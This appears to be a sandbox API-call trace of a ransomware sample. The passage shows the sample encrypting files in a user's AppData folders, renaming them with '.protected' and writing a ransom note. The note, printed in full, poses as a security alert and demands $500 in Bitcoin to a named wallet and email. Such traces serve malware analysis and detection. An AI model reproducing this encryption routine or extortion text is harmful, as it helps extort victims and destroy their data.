(lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.675] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.675] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.675] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.675] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.675] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 90 [0084.675] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.675] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.676] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.676] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.676] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.676] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.677] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.677] CloseHandle (hObject=0x150) returned 1 [0084.677] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected") returned 100 [0084.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.protected")) returned 1 [0084.678] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.678] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.678] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.678] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.678] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.679] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.679] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 88 [0084.679] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.679] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.679] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.679] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.680] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.680] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.680] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.680] CloseHandle (hObject=0x150) returned 1 [0084.681] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected") returned 98 [0084.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].protected")) returned 1 [0084.682] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.682] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.682] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt") returned 96 [0084.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.691] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.692] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.692] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.692] CloseHandle (hObject=0x14c) returned 1 [0084.693] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.693] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.693] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.693] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.693] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.693] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.699] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.700] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.700] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.700] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0084.700] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.701] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0084.701] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.701] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.701] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.701] CloseHandle (hObject=0x14c) returned 1 [0084.703] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected") returned 91 [0084.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.protected")) returned 1 [0084.704] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0084.704] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.704] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0084.704] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.705] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0084.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.705] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0084.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.705] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0084.705] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.707] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.707] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.707] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.707] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.707] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.708] CloseHandle (hObject=0x14c) returned 1 [0084.708] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected") returned 89 [0084.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat.protected")) returned 1 [0084.708] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.708] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Windows") returned -1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files") returned -1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files (x86)") returned -1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="$Recycle.bin") returned 1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="System Volume Information") returned -1 [0084.709] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 78 [0084.709] lstrcmpW (lpString1="KQMHSVKD", lpString2=".") returned 1 [0084.709] lstrcmpW (lpString1="KQMHSVKD", lpString2="..") returned 1 [0084.709] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*") returned 80 [0084.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.709] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.709] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.709] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.709] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.709] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.709] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.") returned 80 [0084.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.709] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.709] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.709] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.709] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.710] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.710] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.710] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.710] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.710] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.710] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.710] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\..") returned 81 [0084.710] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.710] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.710] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.710] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.." (normalized: 